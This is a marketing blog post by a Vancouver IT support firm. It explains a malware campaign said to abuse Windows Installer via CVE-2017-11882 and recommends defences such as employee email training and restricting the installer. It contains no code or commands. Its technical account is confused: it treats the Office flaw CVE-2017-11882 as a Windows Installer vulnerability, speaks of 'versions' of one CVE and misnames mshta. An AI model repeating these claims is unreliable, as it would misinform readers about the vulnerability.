Call Us!
Sales: (604) 239-4283
|
Get Support
|
info@compunet.ca
IT Support For Vancouver Law Firms IT Services For Vancouver Law Firms Vancouver Legal IT Services
  • Managed It Services
  • Cybersecurity
  • Cloud Solutions
Close
Legal IT Support in Vancouver
  • Architecture
    • IT Management
    • Cloud Solutions
    • Software Support
    • Cybersecurity Solutions
  • Law Firms
    • Technology Management
    • Digital Transformation
    • Software Support
    • Cloud Services
    • IT Security
    • Cybersecurity Management
    • Ransomware Prevention
  • Accounting
    • Managed IT Services
    • Cloud Services
    • Ransomware Removal
    • Ransomware Protection
  • Engineering
    • Managed IT
    • Cloud
    • IT Security
    • Ransomware Removal
  • Cybersecurity Services
    • Microsoft MFA
    • Microsoft 365 Secure
    • Microsoft Office Protect
    • Network Security
    • Endpoint Protection
    • Dark Web Protection
  • About Us
    • How We Work
    • Why Choose Us
    • Case Studies
    • Our Blog
    • Is This You?
    • Five-Star Feedback
    • Careers
    • Referral Program
  • Where We Serve
    • Greater Vancouver
    • Burnaby
    • Langley
    • Surrey
    • North Vancouver
    • New Westminster
  • Contact Us
    105-135 East 15th Street
    North Vancouver, BC V7L 2P7
    (604) 986-8170 info@compunet.ca
    Get Support

Are You Using Windows Installer?

You May Be Sabotaging Yourself! This latest cyber-attack uses Windows Installer to download malware onto your computers. What is CVE-2017-11882, and what does it do? How should you detect and protect against it? What other similar malware attacks have come up in the past? These are all questions you should be asking yourself in order […]

Start A Conversation

You May Be Sabotaging Yourself!

This latest cyber-attack uses Windows Installer to download malware onto your computers. What is CVE-2017-11882, and what does it do? How should you detect and protect against it? What other similar malware attacks have come up in the past? These are all questions you should be asking yourself in order to develop the best defense against this type of attack.

Windows Installer

It seems like just when we’ve learned how to protect against one type of malware, four others pop up. Recently, Microsoft began combating CVE-2017-11882, which exploited a vulnerability in Microsoft Office. Then, just as expected, as one weakness was fought, a new one popped up. CVE-2017-11882 exploited a new vulnerability within the Windows Installer.

The previous version of CVE-2017-11882

The previous version would exploit the vulnerability using windows executable msht.exe, and then run a PowerShell script which would download and execute the payload. The problem with this is that while previous versions have edited Microsoft Installer, this version doesn’t edit it. What it actually does is use Microsoft Installer for the exact purpose that it was built for, to install things. Only this time it forces it to install malicious programs on your computer.

The new attack uses msiexec.exe as part of the Windows Installer service. For example, the user could receive an email with an attachment. Since the attachment seems legitimate, the user opens and begins downloading it. This attachment installs a malicious MSI package through the use of CVE-2017-11882. This then, in turn, releases either an MSIL or a Delphi binary. This binary will then launch another instance of itself. This duplicate binary is then hollowed out to create a new home for the new malware payload.

How does CVE-2017-11882 go undetected?

This package provides a compression layer that file scan engines need to process and enumerate in order to detect the file as malicious. This is similar to movies where the complicated retina scan needs is needed to gain access to a specific area of the building, yet the spy is still able to get in, due to his fancy contact lens. The system scans the lens and thinks that he is an authorized user, and allows him passage. Similarly, because of this compressed file mask of sorts, it’s hard to detect and identify the actual payload since it is contained in the heavily obfuscated MSIL or Delphi binary.

What can we do to protect against CVE-2017-11882?

Sometimes there are simple solutions to significant problems. For example, one of the easiest ways in which you can defend yourself and your business from CVE-2017-11882 is by having a strong email policy for your company. You should use strong passwords, with both capital and lowercase letters, as well as some symbols. You should never write passwords down, or use the same password for multiple accounts. Doing so can result in a hacker not only having access to your email but also to any and all accounts. Also, you should change your passwords often; it is recommended to change them every two months. This way you can stay ahead of the hackers before they have an opportunity to figure out your password, you will have already changed it.

Email and Passwords

Besides password strength, you should also focus on training employees about the dangers of email attacks, such as those that use the Microsoft Installer. It’s vital that they are trained not to click or open any suspicious emails. For example, employees should be trained to recognize phishing emails that may carry malware, and also to know how to isolate and flag these emails. This way other employees are immediately notified of the email, and won’t themselves fall victim. Employees should always check emails and names of unknown senders to ensure they are legitimate. They should always look for inconsistencies or style red flags such as grammar mistakes, capital letters, or excessive use of punctuation.

Restrict or disable Windows Installer

A second way to protect yourself is by limiting or completely disabling the Windows Installer itself. This would prevent potential attackers from being able to install their malicious software on your user’s systems. This way, only the system administrator could install programs. Controlling the access and spread of these attacks can significantly help your company to protect itself. Rather than trying to put out fires all over the place, you can then focus on one area and defend it appropriately.

Microsoft Recommendations

Microsoft recommends that if you think that you are infected with this malware, you should use your security software to detect and remove the threat. Remember to use appropriate software based on which operating system you are using. Microsoft states that Windows Defender works best for Windows 10 to detect and remove this malware. Microsoft Security Essentials works for Windows 7 and Windows Vista and has the appropriate defense and removal for this malware. After detection and removal, you should update your software to further protect yourself from future exploits.

Similar previous attacks

Attacks like this are not rare in the least. For example, in November of 2017, there was also a vulnerability in Microsoft Office 2000. This flaw allowed hackers to install malware without user interaction. So, while you were just writing a report in Microsoft Word, hackers were downloading malicious malware into your computer without your knowledge or permission. This could easily be fixed by updating software, such as using only the most recent form of Microsoft Office, so that your computers and networks are protected against the latest of threats.

We should stay vigilant, to protect our network and our businesses. Knowing what is out there and what can wreak havoc on your business is half the battle. The other half is updating your staff and your software to ensure that you are providing the most vigorous defense possible. Look for vulnerabilities in your system and business. Additionally, it is crucial to stay up to date with the latest cyber-attack news. This will keep you in the know as far as what is out there, and what potential threats can affect your business.

 

Schedule Your No Obligation Initial Consultation Now

Complete this short form and schedule your no obligation 10-minute introductory phone call with Compunet Information. A member of our team will reach out immediately.

Latest Blog Posts

What is the Canadian Equivalent of HIPAA?
What is the Canadian Equivalent of HIPAA?
Read More
What Are the Costs of Old Computers for Your Vancouver Law Firm?
What Are the Costs of Old Computers for Your Vancouver Law Firm?
Read More
3 Important Law Firm Cybersecurity Considerations
3 Important Law Firm Cybersecurity Considerations
Read More
Read The Compunet Blog

Architecture

  • IT Management
  • Cloud Solutions
  • Software Support
  • Cybersecurity Solutions

Legal

  • Technology Management
  • Digital Transformation
  • Software Support
  • Cloud Services
  • IT Security
  • Cybersecurity Management
  • Ransomware Prevention

Accounting

  • Managed IT Services
  • Cloud Services
  • Ransomware Removal
  • Ransomware Protection

Engineering

  • Managed IT
  • Cloud
  • IT Security
  • Ransomware Removal

Cybersecurity Services

  • Microsoft MFA
  • Microsoft 365 Secure
  • Microsoft Office Protect
  • Network Security
  • Endpoint Protection
  • Dark Web Protection
Compunet infonech

Compunet InfoTech offers Managed IT Support & Hosted IT Services For Vancouver & Surrounding Areas. Serving Vancouver, Burnaby, Richmond, Surrey, Coquitlam and New Westminster.

105-135 East 15th Street
North Vancouver, BC V7L 2P7

(604) 986-8170
info@compunet.ca

  • About Us
  • Why Choose Us?
  • Media Center
  • Vancouver IT Consulting News
  • Testimonials
  • Greater Vancouver
  • Burnaby
  • North Vancouver
  • Langley
  • Surrey
  • New Westminster

© 2023 Compunet InfoTech. All Rights Reserved.

Sitemap | Privacy Policy | Website Accessibility
Attention North Vancouver Businesses: Are You Worried About Your IT Services Provider?

Get A Free Second Opinion Today from Compunet.

Our comprehensive assessment includes:

  • A thorough analysis of your current IT company’s performance
  • A customized action plan to tackle all operational issues
  • A detailed budget and project plan for seamless execution

Don’t let IT issues hold back your business. Gain the clarity you need to get your IT on the right track. With our no-obligation, risk-free assessment, you have nothing to lose. Contact Compunet now.

Interested?
Schedule Your Initial Consultation with Compunet Today.

Schedule Your Initial Consultation With The Compunet Team.

Fill in your information below to get started today.